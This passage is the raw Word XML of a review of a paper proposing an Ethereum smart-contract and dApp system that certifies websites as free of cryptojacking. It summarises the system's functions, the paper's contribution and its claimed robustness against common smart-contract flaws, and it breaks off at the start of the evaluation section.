          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>()’ or ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>UnregisterSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>()’  to make or delete certification for this website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0B3AF9" w14:textId="45E4522C" w:rsidR="00806493" w:rsidRPr="00C829DC" w:rsidRDefault="00806493" w:rsidP="00D6102C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>If the use web administrator of this website has doubts about content of the verification and whether it’s valid or not he can use the function ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>requestReview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>)’ and pay a token (prize) for the verification of the website (the prize will be in Ethereum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5266EE17" w14:textId="53AB5E43" w:rsidR="000519F7" w:rsidRPr="00C829DC" w:rsidRDefault="00806493" w:rsidP="000519F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">Some group of users will then run the detection program again to verify the website and the administrator will pay tokens to them for their </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>effort</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C10FF" w14:textId="22391630" w:rsidR="000519F7" w:rsidRPr="00C829DC" w:rsidRDefault="000519F7" w:rsidP="000519F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The next 4 images </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>descries</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> the pseudo code of main functions suggested by the writer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E6A017" w14:textId="33515090" w:rsidR="00EA2C57" w:rsidRPr="00EA2C57" w:rsidRDefault="00DF3C4F" w:rsidP="00EA2C57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A7E63">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69116D63" wp14:editId="6AD62C36">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-213360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2301240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3537585" cy="2853690"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3810"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2241613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61324"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7585" cy="2853690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="008A7E63">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A285F32" wp14:editId="41F7DB27">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-137160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>201930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3341370" cy="1536065"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="122556650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66508" name="Picture 1"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1370" cy="1536065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008A7E63" w:rsidRPr="008A7E63">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24FA2CBF" wp14:editId="310C9634">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3432810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2769870" cy="2978785"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="164976321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63215" name="Picture 1"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9870" cy="2978785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="325BE3EC" w14:textId="018DADCD" w:rsidR="008A7E63" w:rsidRDefault="00DF3C4F" w:rsidP="0059247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000519F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6FB7A1F2" wp14:editId="4F673975">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3440430</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1254760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2960370" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="73268149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81495" name="Picture 1"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0370" cy="1885950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C69201E" w14:textId="77777777" w:rsidR="008A7E63" w:rsidRDefault="008A7E63" w:rsidP="0059247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2360EFB0" w14:textId="19369B38" w:rsidR="0059247A" w:rsidRPr="00C829DC" w:rsidRDefault="0059247A" w:rsidP="0059247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Paper scientific contribution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607D368" w14:textId="25216888" w:rsidR="0059247A" w:rsidRPr="00C829DC" w:rsidRDefault="0059247A" w:rsidP="00CC4B03">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="000150A9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">paper introduced a way of detecting malicious websites through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000150A9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>dAp</w:t>
      </w:r>
      <w:r w:rsidR="00327AE5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="000150A9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000150A9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> and smart contracts of Ethereum. In comparison to other similar studies, according to</w:t>
      </w:r>
      <w:r w:rsidR="00E555A0" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00327AE5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>another stated paper</w:t>
      </w:r>
      <w:r w:rsidR="000150A9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">, about 1/3 of total </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000150A9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>cryptojacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000150A9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> sample</w:t>
      </w:r>
      <w:r w:rsidR="0061155C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="000150A9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> disappeared after 15 days mostly due to updates, but the solution suggested by this paper shall decrease this period to 1 day by making the verified site’s </w:t>
      </w:r>
      <w:r w:rsidR="0061155C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>certificate</w:t>
      </w:r>
      <w:r w:rsidR="000150A9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> limited to only 1 day, with comparison </w:t>
      </w:r>
      <w:r w:rsidR="001656B6" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>to other related papers</w:t>
      </w:r>
      <w:r w:rsidR="00CC4B03" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> (according to this paper), concerning the smart contract security analysis, this paper is robust against most of the main </w:t>
      </w:r>
      <w:r w:rsidR="00B96184" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">smart contract vulnerabilities like: Reentrancy, TOD, Mishandled, Timestamp and </w:t>
      </w:r>
      <w:r w:rsidR="00B96184" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Overflow and the next table is taken from the paper</w:t>
      </w:r>
      <w:r w:rsidR="008A4088">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> where [18], [19] and [20] are just referenced papers</w:t>
      </w:r>
      <w:r w:rsidR="00B96184" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A3452" w14:textId="6B10117E" w:rsidR="00B96184" w:rsidRDefault="00B96184" w:rsidP="00CC4B03">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B96184">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7300CA06" wp14:editId="4FA28179">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2963</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3752850" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="355170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7070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52850" cy="1905000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B710A1D" w14:textId="77777777" w:rsidR="00B96184" w:rsidRDefault="00B96184" w:rsidP="0059247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602643DF" w14:textId="77777777" w:rsidR="00B96184" w:rsidRDefault="00B96184" w:rsidP="0059247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13706D8D" w14:textId="77777777" w:rsidR="00B96184" w:rsidRDefault="00B96184" w:rsidP="0059247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071E3E27" w14:textId="627BED68" w:rsidR="00B96184" w:rsidRPr="00B96184" w:rsidRDefault="00B96184" w:rsidP="0059247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733DF5D0" w14:textId="77777777" w:rsidR="00343151" w:rsidRDefault="00343151" w:rsidP="0059247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55614A1F" w14:textId="02B22410" w:rsidR="0059247A" w:rsidRPr="00C829DC" w:rsidRDefault="0059247A" w:rsidP="0059247A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Evaluation to the paper:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C4BA5" w14:textId="2747C7DA" w:rsidR="0059247A" w:rsidRPr="00C829DC" w:rsidRDefault="0059247A" w:rsidP="00E61B0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
